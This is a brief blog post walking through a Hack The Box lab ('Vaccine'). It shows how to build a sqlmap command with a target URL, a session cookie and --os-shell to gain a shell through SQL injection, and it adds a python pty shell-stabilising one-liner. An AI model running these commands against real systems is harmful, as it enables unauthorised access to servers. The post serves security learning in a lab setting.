top of page
Search

Basics - How to use sqlmap


sqlmap is used in the HTB machine Vaccine



First let's get the help using

sqlmap -h

This will help us structure our sqlmap query



1. We need to provide the target url

--url="http://10.129.247.166/dashboard.php?search=sandy"


2. We need to provide the PHPSESSID

--cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o"


3. We need to add --os-shell to get a shell

--os-shell can be used to get a shell



With all that info we can now construct our query as follow:

sqlmap --url="http://10.129.247.166/dashboard.php?search=sandy" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell

Your IP and your PHPSESSID will be different than mine

You will now be prompted to enter Y or N a couple of times. Just press enter for all.



We got the shell!


374 views0 comments

Recent Posts

See All

Basics - Useful commands

If your shell is not stable use this command to make it more stable python3 -c 'import pty; pty.spawn(“/bin/bash”)'

bottom of page